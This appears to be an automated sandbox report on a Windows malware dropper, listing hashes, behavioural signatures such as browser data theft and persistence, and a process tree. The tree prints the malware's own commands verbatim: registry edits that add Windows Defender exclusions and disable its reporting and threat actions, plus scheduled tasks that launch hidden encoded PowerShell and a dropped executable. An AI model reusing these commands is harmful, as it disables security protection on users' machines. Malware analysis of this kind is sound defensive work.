Analysis

  • max time kernel
    92s
  • max time network
    128s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-09-2022 09:12

General

  • Target

    file.exe

  • Size

    7.3MB

  • MD5

    8274763172fef9daf55eed1829e9c94b

  • SHA1

    df9cadfbbd8c7efea80afe9e4fbb996eaed40551

  • SHA256

    7bb683e9de3d6ddf3c4f5e71bdd60dec5385b9873bc9cbfb9a74451c510187f3

  • SHA512

    2e468598a404655050c84d560ab761307937b8355de3ee4cf002986181f0dde01ade9d1f9127d9fcc1b4cd9f58a401a52c46433664cb2a1ce8316f2ec4c95497

  • SSDEEP

    196608:91OiJnIho87QzzwQyMrySoW2sE1qzbGCZOLJsFFL9UUbKcI+:3OiJnInQzs3sxQ1quCZFZUAKcI+

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 3 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 31 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1584
    • C:\Users\Admin\AppData\Local\Temp\7zSA472.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1432
      • C:\Users\Admin\AppData\Local\Temp\7zSA8F7.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks computer location settings
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:1220
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3148
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:936
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:4544
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:3380
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3484
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4336
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:1456
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:1828
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gBJtmZaVP" /SC once /ST 07:48:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:4924
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gBJtmZaVP"
                  4⤵
                    PID:3324
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gBJtmZaVP"
                    4⤵
                      PID:1080
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bNHXguvSZYiOwSiXLC" /SC once /ST 09:13:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\CsJMQOh.exe\" 3x /site_id 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:3060
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                1⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3020
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  2⤵
                    PID:4652
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                  1⤵
                    PID:3820
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                    1⤵
                      PID:5112
                    • C:\Windows\system32\gpscript.exe
                      gpscript.exe /RefreshSystemParam
                      1⤵
                        PID:744
                      • C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\CsJMQOh.exe
                        C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\CsJMQOh.exe 3x /site_id 525403 /S
                        1⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Suspicious use of WriteProcessMemory
                        PID:948
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                          2⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:5012
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4572
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                              4⤵
                                PID:3348
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                              3⤵
                                PID:3508
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                3⤵
                                  PID:3928
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                    PID:3376
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                    3⤵
                                      PID:2760
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                        PID:1040
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                          PID:908
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                            PID:1812
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                              PID:3840
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                                PID:3256
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                  PID:3444
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                    PID:2116
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                      PID:4644
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                      3⤵
                                                        PID:1848
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                          PID:4124
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                            PID:4484
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                            3⤵
                                                              PID:3404
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                                PID:4740
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                  PID:1704
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                    PID:3244
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                    3⤵
                                                                      PID:4152
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                      3⤵
                                                                        PID:2200
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                          PID:3024
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                          3⤵
                                                                            PID:1176
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ATZmuaBwNwmU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ATZmuaBwNwmU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QYiUKrukFVUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QYiUKrukFVUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SHsJRQZsU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SHsJRQZsU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aJAQLsoDkiWqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aJAQLsoDkiWqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fxkldoUMcXUSOxVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fxkldoUMcXUSOxVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MYjwJFnMfsmfKHMw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MYjwJFnMfsmfKHMw\" /t REG_DWORD /d 0 /reg:64;"
                                                                          2⤵
                                                                          • Drops file in System32 directory
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2872
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:32
                                                                            3⤵
                                                                              PID:2108
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:32
                                                                                4⤵
                                                                                  PID:4936
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:64
                                                                                3⤵
                                                                                  PID:4956
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QYiUKrukFVUn" /t REG_DWORD /d 0 /reg:32
                                                                                  3⤵
                                                                                    PID:3912
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QYiUKrukFVUn" /t REG_DWORD /d 0 /reg:64
                                                                                    3⤵
                                                                                      PID:2736
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SHsJRQZsU" /t REG_DWORD /d 0 /reg:32
                                                                                      3⤵
                                                                                        PID:4336
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SHsJRQZsU" /t REG_DWORD /d 0 /reg:64
                                                                                        3⤵
                                                                                          PID:3532
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aJAQLsoDkiWqC" /t REG_DWORD /d 0 /reg:32
                                                                                          3⤵
                                                                                            PID:4940
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aJAQLsoDkiWqC" /t REG_DWORD /d 0 /reg:64
                                                                                            3⤵
                                                                                              PID:3992
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR" /t REG_DWORD /d 0 /reg:32
                                                                                              3⤵
                                                                                                PID:1788
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR" /t REG_DWORD /d 0 /reg:64
                                                                                                3⤵
                                                                                                  PID:3080
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fxkldoUMcXUSOxVB /t REG_DWORD /d 0 /reg:32
                                                                                                  3⤵
                                                                                                    PID:3148
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fxkldoUMcXUSOxVB /t REG_DWORD /d 0 /reg:64
                                                                                                    3⤵
                                                                                                      PID:4672
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt /t REG_DWORD /d 0 /reg:32
                                                                                                      3⤵
                                                                                                        PID:32
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt /t REG_DWORD /d 0 /reg:64
                                                                                                        3⤵
                                                                                                          PID:3580
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MYjwJFnMfsmfKHMw /t REG_DWORD /d 0 /reg:32
                                                                                                          3⤵
                                                                                                            PID:4576
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MYjwJFnMfsmfKHMw /t REG_DWORD /d 0 /reg:64
                                                                                                            3⤵
                                                                                                              PID:4200
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /CREATE /TN "giUfuqrwg" /SC once /ST 08:52:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                            2⤵
                                                                                                            • Creates scheduled task(s)
                                                                                                            PID:3696
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
